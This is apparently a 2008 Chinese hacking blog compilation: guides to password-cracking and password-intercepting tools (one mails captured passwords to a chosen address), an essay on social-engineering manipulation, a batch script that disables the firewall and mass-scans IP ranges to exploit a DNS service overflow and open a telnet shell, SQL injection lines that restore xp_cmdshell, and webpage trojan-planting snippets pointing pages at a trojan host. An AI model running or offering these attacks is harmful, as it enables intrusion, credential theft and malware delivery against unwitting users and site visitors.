　　可能是微软的Office太引人注目了，针对它的破解软件非常多。下面先让我们来看看如何破解它的文档密码。我们选用一款国产的软件“97/2000/XP密码查看器”，这是一款仅有29KB大小的微型简体中文的Word密码解除软件。此软件无需安装，双击可执行文件即可。该工具可以破解Win dows9X/NT/2000/XP全系列的文档密码，可以查找最多13位的密码（未注册版只支持3位），使用“字典式”穷举法破解。使用时在程序中点击“文件”/“打开”命令加入需破解文档；在“任务属性”中设置密码类型，建议将几个选项全部选中；填写密码长度；点击“确定”返回主界面，选择"操作"/"开始破解命令即可进行密码破解。
　　3. 破解Excel文档
　　我们选用一个叫AdvancedExcel97PasswordRecovery的工具，614K，最近版本1.01，它可以迅速破解Excel文件的密码。AdvancedExcel97PasswordRecovery下载后需要安装，安装完毕后打开其程序主界面，通过浏览按钮打开需要解密的电子表格文档，选择密码长度，设置密码类型，最后点击蓝色的开始破解按钮，稍等片刻会弹出文档密码已被破解的提示菜单。
　　4.破解QQ密码
　　我们使用一个叫“OICQ密码终结者”的工具。使用步骤如下：首先要设置你的OICQ的安装目录；接着选择搜索用的字符集，例如选上图中小写字母的字符集，就选中小写字母前的复选框或将"基本设置"下面的所有方框全部选中；然后设置搜索密码的位数，建议不要太长，例如8位，那就需要很长时间，不知你有没有耐心；最后单击"开始"按钮即可进行OICQ的密码破解。据网上高手称Oicqpassovcr的穷举速度可以达到每秒钟数千次，如果你想破解的QQ密码只是4-5位的话，我想在几分钟之内Oicqpassover就可以破解密码了。
　　四、破解网络密码
　　网络正悄然而迅速地走进我们的日常生活。但作为普通的网络用户，人们都有一种共同的忧虑，就是网络的安全隐患。于是不得不对个人网络活动采取有效的保护措施——加上各种密码。但这些密码一旦遗忘，成为我们进行工作的大碍。下面是一些有关网络密码的破解技巧。
　　1. 破解上网账号与密码
　　作为日常上网的桥梁，我们每个人都需要在上网时进行上网账号与密码的设置，这样才能登录网络。利用一些工具软件获得账号并不是很难的事情，甚至可以说是一件轻而易举的事情。这里我们借助一个叫GetIP的工具，这是个由国人刘骥设计开发的“口令密码”识别软件。GetIP能够帮助我们将那些代表口令的密码“***”号还原成真实的口令。如果你需要该软件，可到作者的主页http：//brain.zb169.net/免费下载。GetIP使用十分简单，运行GetIP.exe可执行文件，出现程序界面，将鼠标指向“点击（放大镜）处并拖动”，用鼠标拖着移动到想要得知的密码处，真实的密码口令就会立即反应到"文本"框中。
　　2. 破解IE分级审查密码
　　IE浏览器提供了分级审查功能，它可以在用户的设置下对某些网页进行过滤，只有知道分级审查功能密码的用户才能查看相关网页的信息。如果遗忘了分级审查功能的密码，不但不能访问受到限制的站点，而且不能更改已有的限制级别，重装IE也没有用，怎么办？启动注册表编辑器，找到“HKEY＿LOCAL＿MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼policies＼Ratings”子键，找到一个名叫"KEY"的键值项，它就是用户设置IE分级审查口令（数据已经加密），用户只需删除该键值就可以取消分级审查口令，然后重新设置IE分级审查密码即可。
　　3. 破解OE密码
　　在OE程序中有三种密码：邮箱密码、新闻组密码和用户身份确认密码。下面我们以一个叫“密码截取”（3.1特别版）的软件，可运行于WIN9X/2000/NT/XP，110KB，可到http：//gaoasp.diy.163.com/处下载。软件可以用于破解Web的邮箱密码、POP3收信密码、FTP登录密码，并将密码显示、保存，或发送到用户指定的邮箱。密码截取过程：密码截取软件将截取到的密码输入框中的密码（如拨号连接、OICQ、IE中的密码），以密码明文形式保存在用户自定义的文件中（缺省为c：＼password.txt），如果没有截取到密码，密码文件将不存在。同时可以将获取到的密码发送到用户指定的邮箱中。密码截取2.8支持的操作系统：Windows9X/NT/2000。该软件不需安装，下载并解压后，直接双击getpassword.exe运行，点击图中的"邮件设置"选项，设置将截取到的密码发向指定信箱，接着点击"密码文件"选项，设置将截取到的密码保存在本机的c：＼password.txt中，以便随时查看。
　　4. 破解Foxmail密码
　　有相当多的用户，使用简单却功能强大Foxmail做邮件接收工具。但是由于Foxmail本身的安全隐患，一些人只须新建一个账户后，进入Foxmail缺省的安装目录下，将新建的账户目录下的“account.stg”文件复制后将你的账户文件覆盖，你所建立的账户密码就会被清除。

什么是社会工程学？

214567620@qq.com(L. xin) — Sun, 06 Jul 2008 07:25:05 GMT

总体上来说，社会工程学就是使人们顺从你的意愿、满足你的欲望的一门艺术与学问。它并不单纯是一种控制意志的途径，但它不能帮助你掌握人们在非正常意识以外的行为，且学习与运用这门学问一点也不容易。
　　它同样也蕴涵了各式各样的灵活的构思与变化着的因素。无论任何时候，在需要套取到所需要的信息之前，社会工程学的实施者都必须：掌握大量的相关知识基础、花时间去从事资料的收集与进行必要的如交谈性质的沟通行为。与以往的的入侵行为相类似，社会工程学在实施以前都是要完成很多相关的准备工作的，这些工作甚至要比其本身还要更为繁重。
　　你也许会认为我们现在的论点只是集中在证明“怎样利用这种技术也能进行入侵行为”的一个突破口上。好了，其实这样够公平的了。无论怎么说，“知道这些方法是如何运用的”也是唯一能防范和抵御这类型的入侵攻击的手段了。从这些技术中提取而得出的知识可以帮助你或者你的机构预防这类型的攻击。在出现社会工程学攻击这类型攻击的情况下，像CERT发放的、略带少量相关信息的警告是毫无意义的。它们通常都将简单地归结于：“有的人通过‘假装某些东西是真的’的方式去尝试访问你的系统。不要让他们得逞。”然而，这样的现象却常有发生。
　　那又如何呢？
　　社会工程学定位在计算机信息安全工作链路的一个最脆弱的环节上。我们经常讲：最安全的计算机就是已经拔去了插头（注释：网络接口）的那一台（注释：“物理隔离”）。真实上，你可以去说服某人（注释：使用者）把这台非正常工作状态下的、容易受到攻击的（注释：有漏洞的）机器接上插头（注释：连上网络）并启动（注释：提供日常的服务）。
　　也可以看出，“人”这个环节在整个安全体系中是非常重要的。这不像地球上的计算机系统，不依赖他人手动干预（注释：人有自己的主观思维）。由此意味着这一点信息安全的脆弱性是普遍存在的，它不会因为系统平台、软件、网络又或者是设备的年龄等因素不相同而有所差异。
　　无论是在物理上还是在虚拟的电子信息上，任何一个可以访问系统某个部分（注释：某种服务）的人都有可能构成潜在的安全风险与威胁。任何细微的信息都可能会被社会工程学使用者用着“补给资料”来运用，使其得到其它的信息。这意味着没有把“人”（注释：这里指的是使用者/管理人员等的参与者）这个因素放进企业安全管理策略中去的话将会构成一个很大的安全“裂缝”。
　　一个大问题？
　　安全专家常常会不经意地把安全的观念讲得非常的含糊，这样会导致信息安全上的不牢固性。在这样的情况下社会工程学就是导致不安全的根本之一了。我们不应该模糊人类使用计算机或者影响计算机系统运作这个事实，原因我在之前已经声明过了，地球上的计算机系统不可能没有“人”这个因素的。几乎每个人都有途径去尝试进行社会工程学“攻击”的，唯一的不同之处在于使用这些途径时的技巧高低而已。
　　方法
　　试图驱使某人遵循你的意愿去完成你想要完成的任务是可以有很多种方法的。第一种方法也是最简单明了的方法，就是目标个体被问到要完成你的目的时给予其一个直接的“指引”了。毫无疑问这是最容易成功的，也是最简单与最直观的方法了。当然，被指引的个体也会清楚地知道你想他们干些什么。
　　第二种就是为某个个体度身订造一个人为的（注释：通过捏造的手段）特定情形/环境。这种方法比你仅仅需要考虑到了某个个体的相关信息状况附带更多的因素，例如如何说服你的对象，你可以设定（注释：刻意安排）某个理由/动机去迫使其为你完成某个非其本身意愿的行为结果。这包括了远至于为某个特定的个体创造一个有说服力的企图而进行的工作，与大量你想得到的“目标”的相关知识。这意味着那些特定的情况/环境必须建立在客观事实的基础上。少量的谎言会使效果更好一些。
　　社会工程学中最精炼的手段之一就是针对现实事物的良好记忆能力。在这个问题上黑客与系统管理员会更为侧重一点，特别是在某种事物与他们的领域有所关联的情况下。为了说明上述的方法，我准备列举一个小型的范例.......
　　[范例如下，当你把某个个体“置于”群体/社会压力（注释：其类型如舆论压力等）下的处境/形势时，个体很有可能会做出符合群体决定的行为，尽管这个决定很明显是错误的。]

一致性
　　若在某些情况下有人坚信他们群体的决定是对的话，那么这将有可能导致他们做出不同于往常的判断/行为。比方说如果我曾发表过某个结论，论点的理由非常充分（注释：这里指的是符合群体中多数人的意愿），那么往后无论我花多大的精力去尝试说服他们，都不可能令他们再改变自己的决定了。
　　另外，一个群体是由不同位置/层次的成员组成的。这个位置/层次问题被心理学者称之为“demand charac-teristics”（注释：“意愿的特征性”），这个位置/层次问题在参与者的行为上受其浓厚的社会约束性所影响。不希望得罪其他的成员的、不想被其他人看出自己在会议中想睡觉的、不想破坏与自身关系良好的伙伴的观点等的心态最终都会成为“随波逐流”现象的形成因素。这种运用到特征的处理方式是引导人们行为的一种有效途径。
　　情形
　　无论怎么说，大多数的社会工程学行为都是被一些单独的个体所运用的，因此诸如社会压力与其它的一些影响因素都必须建立在和目标有一定的可信关系的情况下进行的。
　　如果处于这样的情形下，当有了真实或者虚构出来的固有特征时目标个体就很可能会遵循你的意愿而工作了。这些固有特征包括：
　　目标个体以外的压力问题。如让个体相信某个行为的后果并不是他一个人的责任。
　　借助机会去迎合某人。这些行为更多取决于此个体是否认为某个决定能为某人带来“好处”。这样的行为可以使你与老板的关系更为融洽。
　　道德上的责任。个体会遵从你是因为他们觉得自己（注释：在道德上）有义务这么做。这就是利用了内疚感。人们比较愿意逃避内疚感，因此如果有一个“可能”会让他们觉得有内疚感的话他们都会尽可能地去避免这个“可能”。
　　个人的说服力
　　个人的声望/说服能力是一种常被用于促使某人配合/顺从你的有利手段。使用个人说服力的目的并不是要别人强行接受你所指派的“任务”，而是增强他们对完成你所指派的任务的主动顺从意识。
　　其实这是有些矛盾的。基本上，目标只是被我们简单地引导到一个已经设置好的、特定的（注释：故意安排的）思维模式上去。目标会认为他们可以控制住局面，在此同时他们也通过他们的力量帮助了你。
　　事实上，目标所得到的利益与他间接帮助你得到的利益此两者是没有冲突的。社会工程学使用者的目的是说服目标，使其有充分的理由去相信只需花费小量的时间与精力就可以“换取”得到利益了。
　　合作
　　存在着多个因素可以促使一个社会工程学使用者增加与目标“合作”的机会。
　　尽量少与目标发生冲突。使用平和的态度去面对对方可以提高达成目的成功几率。拉拢关系或者发展新的关系，共同的烦恼又或者是一些比较特殊的任务都可以有效地迫使目标与你合作。
　　在这里‘走向成功’的因素往往集中在你是否有能力去掌握与处理好你的说服力。这是非常重要的，这一点常被“骗子”（注释：常常使用欺骗手段的人）认为是万试万灵的手段。心理学研究指出如果人们先前曾经遵照过某个极小的指引而工作（注释：并获得成功）时现在他/她就更可能会去遵照一个更大的（注释：指引）了。在这里如果曾有过合作的前科的话，那么这次再合作，达成的机会就很大了。
　　更好的方法是让社会工程学者给予合作对象一些比较敏感的信息。尤其是一些非常逼真的视听感观，目标能够现场看到或听到你给他们的信息要比他们仅仅可以通过电话听到你的声音更能令他们信服。这个观点一点也不稀奇，以书写形式或电子方式进行交流的信息是很难让人信服的。这就如同拒绝某人进行某个IRC风格的通信一样。关联
　　不管怎么说，社会工程学运用是否能成功也有取决于目标个体与你的目的有多大关联的因素的。我们可以说系统管理员、计算机安全执行官、技术研究人员、那些依靠计算机/网络进行工作又或者通过其进行通信的人与大多数黑客使用社会工程学进行攻击的目标都是有莫大的关联的。
　　有高度关联性的个体大多会被强而有利的论据所说服。事实上你可以给予他们更多强而有利的论据来支持你的观点。当然，那些观点也有薄弱的一面。你是否将论点薄弱的一面展现给有高度关联的人知道将极大可能地决定你是否能说服此人。当某人有可能直接被社会工程学攻击所影响，若此时出现薄弱的论据将有可能会导致其思想上产生“相反”的意识。所以面对与你的目的有关联的人时你必须给予强而有力的论据，而避免出现理由薄弱的论据。
　　相对于对你的指引或你想得到的结果并不敢兴趣的人，你可以把他们列入“低关联的人”这个类别中去。相关的例子如：一个网络系统机构中的保安人员、清洁工人、又或者是前台接待小姐等。因为低关联类别的个体并不会直接对你的目的/结果造成影响，而且他们往往不会去分析你用来说服他们的论点的双面性问题。他们的决策往往会遵循你的意愿又或者是完全不受其它的“意识”所影响。这些的“意识”如：社会工程学所提供的理由、表面形势上的迫急性又或者是在某人强烈的说服下。凭经验而论，在这样的情况下我们只能尽可能地给予其更多的论据与理由了，估计这样的效果会更好一些。基本上，对于那些与你的意识不一致的人，试图用大量的论据和指引去说服他们更胜于他们与你的目的的关联程度。
　　有一点是需要注意的：在进行某些工作的时候，能力低的个体更多会去仿效能力高的个体的行为模式。在计算机系统管理方面，“能力低的个体”大多是指上文所提到的“低关联的人”。站在上述的观点上考虑，不要试图对系统管理员这类别的个体进行社会工程学攻击，除非其能力不及你，不过这样的可能性非常的低。
　　防御他人的攻击
　　综合上述的资料能否让读者更好地保障他们整个计算机系统的安全呢？其实踏出“美好的”第一步就是要视乎员工们能否在自己的工作岗位上保障自己的计算机系统的信息安全。这不但需要你无条件地增强他们的安全防范意识，而且你自身也必须具备更高的警惕性。打个比方，如果你让某人专门负责保护你的计算机系统安全的话，那么就有便利于那个人在没有正常许可的情况下访问你系统的可能了。
　　无论如何，对付与防御这类型攻击的最有效手段，也作为最常见的手段，就是“教育/培训”了。第一步是教育你的雇员与那些有可能被利用作为社会工程学实施目标的人关于计算机/信息安全的重要性。直接给予容易攻击的人们一些预先的警告已经足以让他们去辨认社会工程攻击了。不过要记着，在教育他们计算机信息安全的时候可以使用一些故事及其“双面性”来作为例子。这并不是我自己的个人喜好哦。当个体明白了这个焦点的“双面性”以后他们基本上就不会动摇他们所处的立场了。而且如果他们是专注于计算机安全技术的话，那么他们更有可能会站在维护你的数据安全的立场上。
　　也有不会遵从人们的说服力倾向而作出行动的思维因素的。在这里你必须有清晰的思维、高度的创造力、可以应付和处理压力的能力与适当的自信。压力的处理能力与自信可以通过后天培养。至于自身的主张和见解常常被用于对员工的管理方面，训练它可以减少某些个体被施行社会工程学攻击的机会，也有助于其他方面的工作。
　　了解各种使人们的信息安全意识降低与威胁你的安全策略的因素。其实这方面只需要投入小量的精力就可以在降低安全风险方面产生很大的成效了。
　　结论
　　与普遍的思想观念相反，运用社会工程学捕捉人们的心理状态的技巧要比入侵一个sendmail容易得多。但如果你想让你的员工去预防与检测社会工程学攻击的话，其效果绝对不会比你让他们去维护UNIX系统安全的效果明显。
　　站在系统管理员的立场上，不要让“人之间的关系”问题介入你的信息安全链路之中，以至于让你的努力前功尽弃。站在黑客的立场上呢，当系统管理员的“工作链”上存放有你所需要的数据时，千万不要让他“摆脱”自身的脆弱环节

DNS批量溢出批处理代码

214567620@qq.com(L. xin) — Sun, 06 Jul 2008 07:19:37 GMT

@shift 1
@ setlocal
@ cls
@ color A
@ title DNS批量溢出个人版
@echo ================================================================================
@echo DNS批量溢出个人版
@echo BY Loophole
@echo 1.输入您想溢出的IP段格式：XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX
@echo=================================================================================
@ set /p input=1.输入您想溢出的IP段:
@ echo %input%>>ip.txt
@ net stop sharedaccess
@ net start server
@echo ================================================================================
@set /p c=请选择扫描方式： (1为TCP，2为syn):
@if "%c%"=="2" goto syn
@if "%c%"=="1" goto tcp

:syn
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s syn %%i %%j 53 /save
@ goto ip

:tcp
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s tcp %%i %%j 53 1000 /save

@ goto ip

:ip
@for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
@for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
@for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt

@del ip.txt
@del s1.txt
@del s2.txt
@del Result.txt
@echo=================================================================================
@echo 等待溢出…………当出现类似203.80.19.6 1077 :Vulnerability OS:window 2003
@echo 为可以溢出的IP 203.80.19.6 为IP 1077为端口 2003 为系统类型
@echo 请把能溢出的保存为boot.txt 保存格式：IP 端口系统例如 58.34.125.200 1029 2003
@echo=================================================================================
@ FOR /F "eol= tokens=1 delims= " %%i in (s.txt) do %MYFILES%\dns -s %%i >>a.txt
@echo=================================================================================
@echo 请把能溢出的保存为boot.txt 保存格式：IP 端口系统例如 58.34.125.200 1029 2003
@echo=================================================================================
@pause

@ for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2000all %%i %%j

@for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2003eng %%i %%j
@goto yichu
:yichu
@for /F "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt
@for /F "eol= tokens=1 http://www.77169.com/Images/ucxogu/yichu/77169.htm" target=_blank>溢出…………
@echo=================================================================================
@pause

xp_cmdshell的删除及恢复

214567620@qq.com(L. xin) — Sun, 06 Jul 2008 07:18:11 GMT

一、xp_cmdshell的删除及恢复
1、判断xp_cmdshell是否存在
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
select count(*) from master.dbo.sysobjects where xtype='x' and
返回结果为1就ok
2、恢复xp_cmdshell的方法
删除扩展存储过过程xp_cmdshell的语句
exec sp_dropextendedproc 'xp_cmdshell'
恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and
返回结果为1就ok
否则需上传c:\inetput\web\xplog70.dll后
exec master.dbo.sp_addextendedproc 'xp_cmdshell',’c:\inetput\web\xplog70.dll’;--
如果是用以下方法删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
则可以用以下语句恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复，不用去管sp_addextendedproc是不是存在

常用挂马代码

214567620@qq.com(L. xin) — Sun, 06 Jul 2008 07:17:19 GMT

一:框架挂马

二:js文件挂马
首先将以下代码
document.write("");
保存为xxx.js，
则JS挂马代码为

三:js变形加密

muma.txt可改成任意后缀
四:body挂马

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\nhttp://www.xxx.com/muma.htm/">';
六:css中挂马
body {
background-image: url('javascript:document.write("")')}
七:JAJA挂马

八:图片伪装

九:伪装调用：

十:高级欺骗
http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容